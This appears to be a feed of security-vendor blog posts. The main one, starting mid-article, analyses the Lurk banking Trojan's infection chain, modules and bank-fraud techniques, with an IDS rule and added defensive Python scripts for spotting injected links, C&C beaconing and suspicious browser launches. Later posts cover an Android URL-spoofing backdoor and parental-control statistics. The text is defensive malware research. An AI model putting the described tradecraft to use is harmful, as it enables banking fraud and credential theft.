This is not to say that the Trojan is particularly well written: we have seen and analyzed banker Trojans with much higher code quality. Moreover, our analysis of Lurk has shown that several programmers with different levels of qualification have worked on the code. The developers clearly made some bad choices in places, which have remained unfixed for years (needless to say, we are not going to alert the developers to their mistakes). It is worth noting that the malware writers are developing their product: we see that the quality of code has improved over time and the solutions chosen by the developers have generally improved. What sets Lurk apart is that it is highly targeted – the authors do their best to ensure that as many victims of interest to them as possible get infected without catching the attention of analysts or researchers. The incidents known to us make us believe that Lurk is successful at what it was designed for: we regularly receive reports of thefts from online banking systems and forensic investigations after the incidents reveal traces of Lurk on the affected machines.


The cybercriminals are interested in the following types of organizations:

  • IT organizations working in telecommunications field;
  • mass media and news aggregators;
  • banks and financial organizations.

Compromised computers of IT and telecoms companies provide the cybercriminals behind Lurk with new transfer servers through which traffic goes to the attackers’ servers. Media and news aggregator sites, particularly those visited by accountants, are used to infect a large number of users from Lurk’s ‘target audience’. Banks and financial organizations are of interest to the cybercriminals in connection with their main goal – stealing money.

We won’t comment on the reasons behind the malware authors’ attempts to get a foothold on the machines inside security agencies (these organizations are also among those targeted by Lurk).

The Trojan’s targets appear to include Russia’s four largest banks.


The well-known technique of drive-by downloads is used to distribute the Lurk banker Trojan. In addition, the cybercriminals distribute the Trojan via compromised websites with legitimate software and across corporate networks – using the psexec utility.

Infecting Using an Exploit Pack

Lurk is distributed primarily using the infamous Angler exploit pack (cybercriminals call it XXX). With this method of distribution, users don’t have to do anything in particular for their computers to become infected.

Angler is rightfully considered the flagship of exploit packs: exploits for new vulnerabilities are nearly always first implemented in Angler and only later make their way into other exploit packs (or are perhaps just ‘borrowed’). Exploits for zero-day vulnerabilities are also often implemented in Angler, making the exploit pack particularly dangerous.

Preparation for infecting new victims with Lurk is usually performed as follows:

  1. A website that is of interest to the target audience is selected. This can be a message board for accountants, a news portal, etc.

    The website is infected by stealthily placing a link on it that leads to the exploit pack’s landing page. If it proves impossible to infect the site, a malicious link is placed into the materials of some ‘affiliate program’ that are shown on the site.

  2. Users visiting the site are redirected to the exploit pack’s landing page without their knowledge. Angler attempts to exploit some vulnerability in the software installed on the user’s computer, which should result in the execution of Lurk’s downloader – mini.

Curiously, the link to the exploit pack’s landing page is either placed for a short time or is regularly placed and removed. For example, we have seen the message board of a well-known magazine for accountants become infected. A malicious link appeared on the message board on weekdays for exactly two hours at lunchtime. Of course, we detected the anomalous activity and notified the owners of the resource. However, by the time they read our letter the resource was clean again and they could not identify the infection. At the same time, during the period when the malicious link was shown on the message board, the Lurk owners managed to infect several new user machines.
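The short-lived link described above is exactly the kind of change a periodic integrity check of the site’s own pages would catch. The following is an added example (not Kaspersky’s tooling and not part of the original article) that diffs two constructed snapshots of a page and reports auto-loading references (script, iframe, embed, object) that point to a host other than the site’s own; the page content and the host names in it are placeholders.

```python
"""Report off-site auto-loading references that appear between two page snapshots.

Added example, not Kaspersky's tooling. Both snapshots and every host name
below are constructed placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed baseline snapshot of a hypothetical accountants' message board.
BASELINE_HTML = """
<html><head><script src="/static/board.js"></script></head>
<body><a href="/topics">Topics</a>
<img src="https://cdn.example-board.test/logo.png"></body></html>
"""

# Constructed snapshot taken during the "lunchtime window": one extra hidden
# iframe to a foreign host, the pattern the article describes for the
# exploit pack's landing-page link.
LUNCHTIME_HTML = """
<html><head><script src="/static/board.js"></script></head>
<body><a href="/topics">Topics</a>
<img src="https://cdn.example-board.test/logo.png">
<iframe src="http://landing.placeholder.test/gate.php" width="1" height="1"></iframe>
</body></html>
"""

# Tags whose URL attribute the browser fetches without any user action.
AUTO_FETCH = {"script": "src", "iframe": "src", "frame": "src", "embed": "src", "object": "data"}


class RefCollector(HTMLParser):
    """Collect (tag, url) for every auto-fetching tag in a document."""

    def __init__(self):
        super().__init__()
        self.refs = set()

    def handle_starttag(self, tag, attrs):
        attr_name = AUTO_FETCH.get(tag)
        if attr_name is None:
            return
        for name, value in attrs:
            if name == attr_name and value:
                self.refs.add((tag, value))


def offsite_refs(html, site_host):
    """Return the auto-fetching references whose host is not the site's own."""
    parser = RefCollector()
    parser.feed(html)
    result = set()
    for tag, url in parser.refs:
        host = urlparse(url).netloc.lower()
        if host and host != site_host.lower():   # relative URLs have no host
            result.add((tag, url))
    return result


def new_offsite_refs(baseline_html, current_html, site_host):
    """Off-site references present in the current snapshot but not in the baseline."""
    return sorted(offsite_refs(current_html, site_host) - offsite_refs(baseline_html, site_host))


if __name__ == "__main__":
    for tag, url in new_offsite_refs(BASELINE_HTML, LUNCHTIME_HTML, "board.example-board.test"):
        print(f"new off-site {tag}: {url}")
```

Run against snapshots taken every few minutes, the diff surfaces an injected reference even when it is removed again before anyone reads the alert; the first snapshot that contains it is also the evidence the site owner needs, which the message-board owners in the story above no longer had by the time they looked.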

Infecting via Compromised Websites

The second method of infection that the cybercriminals used extensively is the distribution of malicious code via legitimate websites. Apparently, this distribution method involves providing infected files to users in the RU zone only, while other users get clean files.

Infecting Machines across a Corporate Network

The scheme whereby one computer in an organization is initially infected is very popular among cybercriminals. Even if the infected machine itself is of no interest to the attackers, the computer is on the same network and in the same domain as other computers containing information that the Trojan’s owners want. In such cases, the psexec utility developed by Mark Russinovich is used to distribute the malware across the network. A special mini dropper is then used to execute the Trojan’s main module on other computers on the same network. This method can result in dire consequences for the organization, since the security of a computer containing data of interest to the cybercriminals essentially depends on that of the least protected computer on the network under attack.

Main Modules

The Trojan consists of several modules that have reasonably rich capabilities. The main Lurk modules are:

  • mini module;
  • prescanner module;
  • core module (the bot’s kernel);
  • core_x64 module (64-bit version of the kernel);
  • mini_x64 module (64-bit version of the mini module).

The mini Module

In the first stage of an attack involving the Angler exploit pack, a vulnerability found in the user’s software is exploited and the mini module of Lurk banker Trojan is downloaded and executed. As mentioned above, the user can download the malicious file from a compromised website; another possibility is infection over the local network.

By Lurk standards, mini is a small program (100-400 KB). Its main function is to download and execute two other main Lurk modules. The address of the server used by mini is hardcoded in the program’s body. Modules are downloaded using standard GET requests. The modules downloaded by mini are encrypted, with different encryption algorithms used. The prescanner module is encrypted using the simple “xor-next” algorithm. Other modules are encrypted using the BlowFish algorithm (ECB Mode), the pseudo key for which is hardcoded into mini. The real key is created from the hardcoded pseudo key using a sequential search for one character (a brute force attack).

To avoid having to download additional modules every time mini is executed, the Trojan saves these modules in a separate encrypted file located in the %APPDATA% folder. The contents of the storage are encrypted with the Blowfish algorithm, using a key that depends on the time the Windows folder was created. In addition to a plugin’s name and body, the storage file includes a list of checksums of the names of those processes in whose context the plugin is to be executed. This information is used by mini to determine which process a plugin should be injected into: for web injection modules, this is a browser process; for the ibank module, it is Java.exe, in whose context the online banking system operates.

The prescanner module

According to the operating logic of mini, the second stage of the attack is to load the prescanner module. The module is a dynamically loaded library with only one exported function – Prescan.

The cybercriminals need prescanner to make their attacks as narrowly targeted as possible. If a machine does not match the specific rules of prescanner and no online banking systems have been found on it, the module reports this to mini and the latter decides not to try to achieve persistence on the machine. In this way, the Trojan’s developers try to avoid attracting the attention of law enforcement agencies and anti-malware product developers. The following fact supports this idea: every time a new bot is registered by the C&C, a unique identifier – bot number – is assigned to the bot. In the more than five years that the banker Trojan has existed, only about 60,000 bots have been registered by the C&C.

Prescanner performs two main tasks:

  • collecting information about an infected system;
  • grabbing passwords from FTP clients found on the user’s machine.

After collecting information about the machine and checking whether its rules are observed, prescanner sends a report to its command server. In the cases that we have seen, the C&C used by prescanner was the same as that used by the mini downloader.

If it is decided that a machine is unsuitable for a Lurk attack based on the analysis performed, mini and prescanner modules terminate and uninstall themselves. If prescanner has made the decision to ensure persistence on the machine, it reports this to the mini downloader, which in turn downloads and executes the core module – the bot’s main body.

The core module

Core is the main module of Lurk. Its main functions are:

  • network interaction with the C&C;
  • executing commands received from the cybercriminals;
  • logging keypresses (keylogger function) and recording video from the infected system’s screen;
  • maintaining the encrypted data storage and Lurk settings;
  • downloading, installing and executing the Trojan’s additional modules.

The core module is a communication channel of sorts between all the other malware modules and the command server. The C&C servers used for mini and for core are different. Core does not have a hardcoded command server address. The address of its command server is calculated using DGA – the Domain Generation Algorithm. Among other DGA input parameters, the Trojan’s authors use exchange quotation data received from Yahoo Finance. This means that the data used to generate C&C addresses cannot be known to security experts in advance. As a result, it is impossible to predict the addresses generated by Lurk.

After successfully establishing a connection, data collected by the malware and the results of executing commands are sent to the command server every five minutes, with requests for new updates and commands. All communication between the core module and the C&C is encrypted – core and C&C exchange data is in the JSON format.

The function of intercepting data entered on the keyboard is implemented in the core module in the newer versions of Lurk (starting at least from 8.9773). Keypresses are intercepted only in the context of windows that have specific words/phrases in their names. The list of these words/phrases is received from the C&C. Intercepted data is sent to the command server during the next communication session (every 5 minutes).
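The fixed five-minute cadence described above is something a defender can hunt for in proxy or firewall logs without knowing the C&C address in advance (which, given the DGA, is the point). The script below is an added example, not Kaspersky’s detection logic and not from the article: it groups requests by source/destination pair and flags pairs whose inter-request gaps are almost constant. The log lines and their field layout (timestamp, source, destination, method) are constructed assumptions.

```python
"""Flag fixed-interval outbound requests (beaconing) in proxy-style logs.

Added example, not from the Lurk analysis or Kaspersky tooling. The log lines
are constructed and the field layout is an assumption.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log: 10.0.0.5 posts to 203.0.113.10 every ~300 s (a Lurk-style
# five-minute loop); 10.0.0.7 fetches from 198.51.100.20 at human-like irregular times.
LOG_LINES = """
2016-06-10T09:00:00 10.0.0.5 203.0.113.10 POST
2016-06-10T09:05:01 10.0.0.5 203.0.113.10 POST
2016-06-10T09:10:00 10.0.0.5 203.0.113.10 POST
2016-06-10T09:14:59 10.0.0.5 203.0.113.10 POST
2016-06-10T09:20:00 10.0.0.5 203.0.113.10 POST
2016-06-10T09:25:01 10.0.0.5 203.0.113.10 POST
2016-06-10T09:01:13 10.0.0.7 198.51.100.20 GET
2016-06-10T09:01:15 10.0.0.7 198.51.100.20 GET
2016-06-10T09:17:40 10.0.0.7 198.51.100.20 GET
2016-06-10T09:42:02 10.0.0.7 198.51.100.20 GET
2016-06-10T10:05:55 10.0.0.7 198.51.100.20 GET
2016-06-10T10:06:10 10.0.0.7 198.51.100.20 GET
""".strip().splitlines()


def parse(lines):
    """Group request timestamps by (source, destination) pair."""
    pairs = defaultdict(list)
    for line in lines:
        ts, src, dst, _method = line.split()
        pairs[(src, dst)].append(datetime.fromisoformat(ts))
    return pairs


def find_beacons(lines, min_requests=5, max_jitter=0.05):
    """Return (src, dst, period_seconds) for pairs with near-constant request gaps.

    Jitter is the coefficient of variation (stdev / mean) of the gaps: a
    timer-driven C&C loop gives a very small ratio, human browsing a large one.
    """
    findings = []
    for (src, dst), stamps in parse(lines).items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            findings.append((src, dst, round(avg)))
    return findings


if __name__ == "__main__":
    for src, dst, period in find_beacons(LOG_LINES):
        print(f"{src} -> {dst}: ~{period}s cadence")
```

The thresholds are starting points: software updaters and monitoring agents beacon too, so the output is a hunt list to be checked against known-good destinations, not an alert on its own.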

The main part of Lurk’s storage is located in the system registry, but some additional data belonging to the storage can be saved as a file on the hard drive. As a rule, files are used to store a large but logically uniform volume of data, such as video captured from the screen or code for web injection. But in any case, links to these additional files are always present in the main part of the storage, which is located in system registry.

Additional modules

The bot’s additional modules (plugins) are downloaded by the core module to those computers the malicious program deems most suitable. Those modules that are required on a specific computer to steal money are downloaded to that computer.

The Lurk modules currently known to us are listed in the table below.

Plugin GUID | Name | Plugin function
{5FBA6505-4075-485b-AEC4-75767D9054C9} | module_Bifit | A set of .class files designed to introduce changes into the normal operation of iBank 2 systems, in order to steal money.
{0F3E7AFA-1F2B-4b0e-99D6-3716A4C3D6DE} | module_Bifit_admin | An administrative applet for iBank 2 systems modified by cybercriminals, designed to steal credentials and key files from iBank 2 systems.
{04DB063E-1454-4a73-B2CC-4DB6D4BB6AA1} | module_ibank | This plugin is used to inject malicious applets into the iBank 2 system. These applets (along with other tools) are used to steal money from the user.
{AABA3126-14E2-443b-A11B-FB6C1F793103} | module_w3bank | This plugin is designed to organize web injections into the pages of remote banking systems.
{5C345F77-B111-4a85-B6D6-EC8F27F993C4} | module_w3bank_scripts | A set of scripts written in JavaScript for injection by the module w3bank; designed to steal money and data from remote banking systems.
{50D13F6C-FC46-4fdf-A294-E149D36E54D4} | module_spider | An auxiliary module whose main task is to ensure other Lurk modules are loaded into the contexts of the processes iexplore.exe, firefox.exe, chrome.exe, opera.exe, jp2launcher.exe, java.exe before these processes are actually launched.
{52F1F7D8-4BCC-4498-AC86-3562F81990F6} | module_vnc | This plugin provides remote access via VNC to the infected computer (for remote control over the infected computer).
{A06B5020-0DF3-11E5-BE38-AE5E4B860EDE} | rdp-plugin-x86 | This plugin ensures that RDP is enabled on the infected computer.
{9F786E98-3D4C-4020-8819-B97D9D4DBCC0} | highLauncher | Bot plugin loader at a high integrity level (required for rdp-plugin-x86 and lsa-plugin-x86).
{968A2A9A-7DF4-4E69-BF81-563AF8FFB7DC} | launcher | The loader of mini. It awaits an IPC message with the name <LurkDll>, after which it loads mini with the help of LoadLibrary(). It is used in the mini launch process while escalating privileges.
{5B3957F2-AAAF-4FF8-94B8-83C52AFCD2A9} | lsa-plugin-x86 | The plugin for grabbing administrator and/or domain accounts (the well-known program mimikatz is used).

We will now look at three bot modules (plugins) in more detail – they are the modules w3bank and ibank.dll – the two workhorses of the Lurk Trojan that are directly involved in stealing money – and the module_vnc module that makes it possible to remotely control the infected system using the VNC protocol.

The w3bank module

The w3bank module is designed for attacks on remote banking systems. Its main task is to perform injections into the user’s browser.

The ibank module

The ibank module is designed to steal money in iBank remote banking systems.

This module runs in the context of a Java virtual machine. When a Java applet is started, it is checked to see whether it belongs to the iBank 2 system. If this remote banking system is launched, a request is sent to the C&C asking if the applet should be blocked or allowed to run. If an “allow to run” command arrives in response, a set of Java-class files is sent to replace the original classes of the iBank applet.

The infected applet enables the cybercriminals to stealthily replace the data in payment orders, leaving the original information in the printouts.

The module_vnc module

The module_vnc module provides the ability to remotely control an infected system using the VNC protocol. When this happens, the remote node gains full access to the system: it can see the image displayed on the screen, send and receive any files or data, including data from video/audio input devices, use the software installed on the machine and install new software.

This module also makes it possible to launch browser processes with the following parameters:

Mozilla Firefox: -profile
Google Chrome: --user-data-dir=
Internet Explorer: -nomerge

Each time Mozilla Firefox and Google Chrome are launched a new browser user profile is created. This helps hide the Trojan’s activities from the legitimate user, who will not be able to see any trace in the history of visited sites. This also helps create a separate session on a website, parallel to an already open session. In particular, this makes it possible to log in a second time to the site the legitimate user is working with, and perform actions in a parallel session that will not affect the user’s session.
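The three switches listed above are good hunting material in process-creation telemetry: a browser started with a throw-away profile directory, or by a parent that is not the user’s shell, is unusual on an office workstation. The script below is an added example (not Kaspersky’s detection logic, not part of the article) that reviews constructed process records; the record layout (parent image, image, command line) and the list of “expected” parents are assumptions to be tuned per environment.

```python
"""Review browser launches for the profile-isolation switches the module_vnc plugin uses.

Added example, not Kaspersky's detection logic. Process records below are
constructed; the (parent, image, command line) layout is an assumption.
"""
import re

# Constructed process-creation records: (parent image, image, command line).
EVENTS = [
    ("explorer.exe", "chrome.exe",
     r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://bank.example.com'),
    ("svchost.exe", "chrome.exe",
     r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir=C:\Users\u\AppData\Local\Temp\p1 https://bank.example.com'),
    ("explorer.exe", "firefox.exe",
     r'"C:\Program Files\Mozilla Firefox\firefox.exe"'),
    ("java.exe", "firefox.exe",
     r'"C:\Program Files\Mozilla Firefox\firefox.exe" -profile C:\Users\u\AppData\Local\Temp\ff1'),
    ("explorer.exe", "iexplore.exe",
     r'"C:\Program Files\Internet Explorer\iexplore.exe" -nomerge https://bank.example.com'),
]

# One switch per browser, as listed in the article; the capture group picks up
# the profile directory where the switch takes one.
SUSPICIOUS_SWITCHES = {
    "chrome.exe": re.compile(r"--user-data-dir=(\S+)", re.I),
    "firefox.exe": re.compile(r"(?:^|\s)-profile\s+(\S+)", re.I),
    "iexplore.exe": re.compile(r"(?:^|\s)-nomerge(?:\s|$)", re.I),
}

# Parents that normally start a browser for an interactive user (assumption; tune per estate).
EXPECTED_PARENTS = {"explorer.exe"}


def review(events):
    """Return (image, parent, detail, unexpected_parent) for every launch using a listed switch.

    `detail` is the profile directory for Chrome/Firefox and the bare switch for IE;
    `unexpected_parent` is True when the launching process is not a user shell.
    """
    hits = []
    for parent, image, cmdline in events:
        pattern = SUSPICIOUS_SWITCHES.get(image.lower())
        if pattern is None:
            continue
        match = pattern.search(cmdline)
        if match is None:
            continue
        detail = match.group(1) if match.groups() else "-nomerge"
        hits.append((image, parent, detail, parent.lower() not in EXPECTED_PARENTS))
    return hits


if __name__ == "__main__":
    for image, parent, detail, odd_parent in review(EVENTS):
        print(f"{image} started by {parent}: {detail}{'  <- unexpected parent' if odd_parent else ''}")
```

Legitimate users do occasionally pass `-profile` or `-nomerge` themselves, so the parent-process column matters more than the switch alone: a browser spawned by java.exe or a service host, with a profile under a temporary directory, is the combination worth an analyst’s time.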

Stages of a Lurk attack

As a result, the Trojan’s typical attack sequence is as follows:

  1. The user’s computer is infected by exploiting a vulnerability;
  2. The mini module is launched on the infected computer;
  3. mini downloads the prescanner module and launches it;
  4. prescanner steals the user’s FTP credentials;
  5. If an analysis finds that the infected computer is unsuitable, mini and prescanner silently terminate themselves;
  6. If the infected computer is of interest to the cybercriminals, the attack continues;
  7. If the attack continues, mini downloads and launches the core module, the bot’s main body;
  8. core connects to the bot’s C&C server, receives commands from the cybercriminals and executes them;
  9. core receives the bot’s additional plugins;
  10. core spies on the user: it intercepts data entered from the keyboard and captures the video stream from the screen of the infected system. Capturing is only performed for windows with specific keywords/phrases in their names. The list of keywords is received from the C&C and is primarily determined by the financial interests of Lurk’s owners;
  11. Using additional modules (ibank, w3bank), Lurk steals money from remote banking systems.

Example of an Attack on a Bank

During our research, we detected a Lurk attack on a major Russian bank that was using the w3bank module to perform web injections. We were able to obtain the scripts of the injections.

The files of the infection scripts have identical names for different remote online banking systems (content.min.js), but a different GUID, as the latter is generated in a random fashion.

This script intercepts the authentication information entered into the remote banking system. When the user logs in to the remote banking system, their username and password are intercepted. After successful authentication, a parallel session is created that is hidden from the user and in which Lurk scans the banking pages and searches for the card holder’s name and the phone number linked to the card. The malicious script collects all the information required to make a payment in that online banking system. This information is then sent to the C&C server whose address is identical to the network address of the server communicating with the core module.

In response, the C&C server may send a script to be executed in the browser context. We were unable to obtain such a script for this research.

The C&C server may also register an automated payment that will be executed the next time the user logs in to the online banking system.


The Trojan’s creators have made an effort to protect their creation from researchers, and especially to protect Lurk from an in-depth analysis, or, at the very least, greatly hinder such analysis. However, despite all the difficulties of analyzing the Trojan, Lurk is quickly detected by modern anti-malware solutions.

It’s not only anti-malware companies that are countering Lurk; the manufacturer of the iBank 2 system, BIFIT, is also taking measures to combat the attacks launched against its product. The company has implemented methods to counteract banking Trojans in its iBank 2 software and investigated their effectiveness. The BIFIT research shows that of all the protection tools implemented in iBank 2, only control over the bank’s server is effective against Lurk; all the other measures implemented in iBank 2 were successfully bypassed by the Lurk creators, testifying to their professionalism.

Lurk gives the impression of being a complex, powerful system designed to achieve its creators’ criminal goals, i.e., stealing money from users. The perseverance and focus with which they work with their Trojan suggest they are highly motivated.

Kaspersky Lab counteracts this Trojan using signature-based, heuristic and proactive detection methods. With this approach, we can even detect new specimens of Lurk before they are added to our collection. Kaspersky Lab’s products detect this Trojan with the following verdicts: Trojan.Win32.Lurk, Trojan-Banker.Win32.Lurk, Trojan-Spy.Win32.Lurk.

In conclusion, we give the following recommendations that may be hackneyed but are nonetheless relevant. The security of an online banking system is ensured by:

  • Competent design and administration of an organization’s local area networks;
  • Regular training on information security rules and norms for employees;
  • Use of modern security software that is regularly updated.

We are confident that observing these simple rules will help ensure a high level of protection from Lurk and similar threats.

IOCS: Registry keys:


Files: Possible names of the mini module:


Possible names of the storage module:


Network indicators: C&C servers:


IDS rules:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Bot.Lurk.HTTP.C&C"; flow:established,to_server; content:"POST"; pcre:"/\?hl=[a-z]+&source=[^\r\n&]+&q=[^\r\n&]+/msi";)
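Before deploying a rule like the one above it is worth checking exactly what its PCRE does and does not match. The script below is an added example (not part of the article and not an IDS) that applies the rule’s two content conditions, the literal “POST” and the query-string pattern with its /msi modifiers, to constructed HTTP request samples; the host names in the samples are placeholders.

```python
"""Exercise the Lurk C&C IDS rule's content and pcre conditions against sample requests.

Added example, not part of the article or of any IDS. The requests are
constructed; only the pattern comes from the rule.
"""
import re

# The rule's pcre, with the /m, /s and /i modifiers mapped to Python flags.
LURK_CNC_RE = re.compile(r"\?hl=[a-z]+&source=[^\r\n&]+&q=[^\r\n&]+", re.M | re.S | re.I)

# Constructed request payloads (request line plus Host header, as a to_server
# HTTP payload begins). Host names are placeholders.
SAMPLES = {
    "lurk_like":   "POST /search?hl=ru&source=core&q=ZGF0YQ== HTTP/1.1\r\nHost: c2.placeholder.test\r\n",
    "get_variant": "GET /search?hl=ru&source=core&q=ZGF0YQ== HTTP/1.1\r\nHost: c2.placeholder.test\r\n",
    "no_q_param":  "POST /search?hl=en&source=web HTTP/1.1\r\nHost: www.example.com\r\n",
    "benign_post": "POST /api/login HTTP/1.1\r\nHost: www.example.com\r\n",
}


def matches_rule(payload):
    """Mirror the rule: content:"POST" anywhere in the payload AND the pcre must match."""
    return "POST" in payload and LURK_CNC_RE.search(payload) is not None


def classify(samples):
    """Map each sample name to whether the rule would fire on it."""
    return {name: matches_rule(payload) for name, payload in samples.items()}


if __name__ == "__main__":
    for name, fired in classify(SAMPLES).items():
        print(f"{name:12s} {'ALERT' if fired else 'pass'}")
```

Two caveats fall out of the exercise: the `content:"POST"` match is unanchored, so it is satisfied by the string anywhere in the payload, and the hl/source/q parameter names are the same ones a common search engine uses, so a POST carrying a search-style query string from a legitimate site will also trigger; the `flow` and port constraints narrow this somewhat, but the rule is best used as one signal among several rather than a blocking rule on its own.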

MD5: mini:

Everyone sees not what they want to see

Malware Alerts - Mon, 06/06/2016 - 06:57

In early March, Kaspersky Lab detected the modular Trojan Backdoor.AndroidOS.Triada which granted superuser privileges to downloaded Trojans (i.e. the payload), as well as the chance to get embedded into system processes. Soon after that, on March 15, we found one of the modules enabling a dangerous attack – spoofing URLs loaded in the browser.

The malicious module consists of several parts and is detected by Kaspersky Lab products as Backdoor.AndroidOS.Triada.p/o/q. When it gains superuser privileges, it uses regular Linux debugging tools to embed its DLL (Triada.q, which then loads Triada.o) into the processes of the following browsers:

  • (the standard Android browser)
  • com.qihoo.browser (360 Secure Browser)
  • com.ijinshan.browser_fast (Cheetah browser)
  • com.oupeng.browser (Oupeng browser)

The DLL intercepts the URL the user is opening, analyzes it and, if necessary, changes it to another URL. The rules for changing the URL are downloaded from the C&C server while the module is running.

Attack sequence

In an uninfected system, the browser sends a request with a URL address to the web server via the Internet, and receives a page in response.

After infection by Triada, a DLL intercepting URLs is added to the browser’s process. The URL address request finds its way into this DLL, where it is modified and sent to another web server.

As a result, the browser receives data that’s different from that requested, meaning the user ends up viewing a different page.

Now, this sequence of actions is being used by malware creators to change the standard search engine selected in the user’s browser, and to replace the home page. Essentially, these actions are identical to those carried out by numerous adware programs for Windows. However, there is nothing to stop similar attacks intercepting any URL, including banking URLs, and redirecting users to phishing pages, etc. All it takes is for the cybercriminals to send the appropriate command.

During our observation period, this module attacked 247 users, and there have been no signs of a decrease in the intensity of attacks. The number of module versions is small; it appears the creators of this backdoor have decided to focus their efforts elsewhere, in spite of all the ‘promise’ shown by this technology.

The geographical distribution is very similar to that of root-access malware, as this module can only function together with Triada, and is downloaded by Triada.

Number of users attacked by Backdoor.AndroidOS.Triada.p in different countries

In conclusion, we would like to note that cybercriminals specializing in Android are pretty lazy – it’s easier for them to steal money directly, for instance, with the help of Trojans that send text messages to premium-rate numbers, or spoof banking app windows. However, we have recently observed that some cybercriminals have begun to actively study the structure of the operating system, expand their repertoire of technical skills, and launch sophisticated attacks like the one we examined above.

Small users in a big network

Malware Alerts - Mon, 05/30/2016 - 06:58

Children use the Internet for schoolwork, socializing, watching films and cartoons, playing games and much more. But, as we all know, browsing the web can be an unsafe business. In order to control their children’s online activity many parents use specialized software – so-called parental control.

This software is usually capable of controlling the amount of time a child spends online or using the computer, which apps can be launched and what personal data can be disclosed. One of the most important features of a parental control product, however, is the ability to restrict access to web resources containing undesirable content.

This article examines the statistics of visits by children to websites with specific categories of content. For this we will use Kaspersky Security Network (KSN) statistics based on notifications by the Parental Control module in Kaspersky Lab products. These statistics will allow us to estimate which categories of undesirable websites children visit most often.

How the statistics are collected

Kaspersky Lab’s Parental Control module scans the content of the webpage that a child is trying to visit. If the site belongs to one of the 14 categories listed in the module, it notifies KSN (no personal data is involved and the user’s confidentiality is respected).

Access to that webpage is only denied if the parents have selected the appropriate category in the product settings. The statistics are collected anonymously, regardless of whether the parents have selected the appropriate category (i.e., whether or not that category is blocked by Parental Control).

It should be noted that these statistics do not include mobile device statistics.

At the current time, web filtration is carried out for the following content categories:

We selected the first 12 categories for analysis. We decided to omit “Religion” and “News media” as these categories were only introduced recently and sufficient statistics have not yet been collected.

The global picture

First of all, let’s look at the global statistics.

Distribution of Parental Control notifications between the 12 website categories globally, April 2015 – April 2016.

We can see from this diagram that children around the world spend most time on social networking sites and instant messengers, playing computer games, and, while online, repeatedly encounter the themes of alcohol, tobacco and drugs. Less frequently, children and teenagers visit online stores, watch videos and listen to music online, sometimes encounter obscene language and occasionally visit (perhaps accidentally) porn sites.

These are the average statistics for the entire world. But are they the same for all regions or countries? It turns out that they aren’t.

Regional differences

For our comparison, we selected the top five website categories from the global ranking and looked at how they differed across five regions:

  • North America (US and Canada)
  • Western Europe (Austria, Belgium, UK, Germany, Denmark, Ireland, Spain, Italy, Liechtenstein, Luxembourg, Monaco, Portugal, France, Switzerland, Sweden)
  • CIS (Russia, Kazakhstan, Belarus, Ukraine)
  • Latin America (Argentina, Brazil, Mexico)
  • Far East (China, Singapore, Hong Kong, Macao, Taiwan, Japan, South Korea).

The results of the comparison are shown below:

Proportion of Parental Control notifications for Top 5 categories in different regions

In North America, children visit social media websites, use instant messaging systems, chats and forums less frequently than the world average, although they show more interest in computer games, alcohol and online shopping.

The situation in Western Europe is very similar to that in North America.

In the CIS, children and teenagers are less interested in online shopping than in other regions.

In Latin America, as well as in the CIS, Internet communication media are very popular with kids and teens, while computer games are played less frequently than in other regions.

The situation is different in the Far East. Social networks are almost as popular there as they are in western countries, but kids and teens don’t spend as much time playing online computer games (which may be due to the popularity of game consoles). Instead, they spend more time visiting online shops, such as Rakuten and Uniqlo in Japan, and Taobao in China.

Differences between countries

We found that even between countries within the same region there are differences in the popularity of the website categories. For the purposes of comparing the situations in different countries, we added the “Adult content” category to the top five. Let’s begin with that category.

Adult content

When we speak of children’s safety online, it’s impossible to avoid the topic of pornography – this is the worst nightmare for millions of parents. For quite some time, this category was at the top of the ratings, but we now have some good news! According to Kaspersky Lab’s Parental Control statistics, children from around the world are visiting pornographic and erotic websites, adult dating sites and online sex shops less and less.

Popularity of the “Adult content” category around the world, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control module statistics

However, we cannot rule out the possibility that children visit adult content websites from their mobile devices: for them, it is easier to watch porn on their phone, with no parental control tools installed, than it is on a computer that is closely watched by their parents.

Children in China show the most interest in adult content sites. Children in the UK, US and Russia visit such sites less often.

Popularity of the “Adult content” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control module statistics

According to Kaspersky Lab’s Parental Control statistics, the adult content website www.xvideos[.]com is the most popular in all regions. If the Parental Control module is configured to block access to adult content sites, then a child’s attempt to visit this site will finish with a warning screen being displayed. It should be noted that Safe Kids, Kaspersky Lab’s new product, works on mobile devices as well:

Safe Kids notification on a mobile device

If you want to reliably safeguard your child from adult content, make sure you block this category in the parental control module.

Internet communication media

67% of all visits were to websites belonging to the “Internet communication media” category, which includes social networks, instant messengers, chats and forums.

Unsurprisingly, social networks are the most popular sites with children throughout the world – these sites allow them to talk to their friends, keep a kind of diary, share photos and videos, as well as shop online, play games, and watch cartoons or films. As well as all that, there is a lot of content that children shouldn’t be seeing: on some social networks you can find pornography and buy drugs.

The most frequently visited sites in this category are Facebook, Twitter, YouTube and Pinterest. To a lesser extent children also visit Instagram and the web-based version of the WhatsApp messenger.

According to KSN data, over the last year and a half children and teenagers have been spending less time chatting with their friends online from their computers.

Popularity of the “Internet communication media” category worldwide, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control statistics

We presume that this is due to the growing popularity of mobile Internet. Today, mobile devices are being used more and more for online communications, especially in developed countries. This is beyond the scope of this analysis, however, as we are looking at the statistics of Parental Control module detections on computers; these statistics don’t take into account how many times a day children and teenagers visit their social media accounts from mobile devices. Also, IM services such as Telegram or Viber are primarily accessed from mobile devices. In other words, children, and especially teenagers, are far more active than these statistics suggest when it comes to both types of online communications (i.e. mobile- and computer-based).

Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Internet communication media are most popular in Mexico, Brazil, Russia and Italy, and least popular in China, Germany and the UK.

We presume that for China, this is due to the state’s Internet censorship practices, while in Germany and the UK it is related to the widespread use of mobile technologies and smartphones in the everyday lives of schoolchildren.

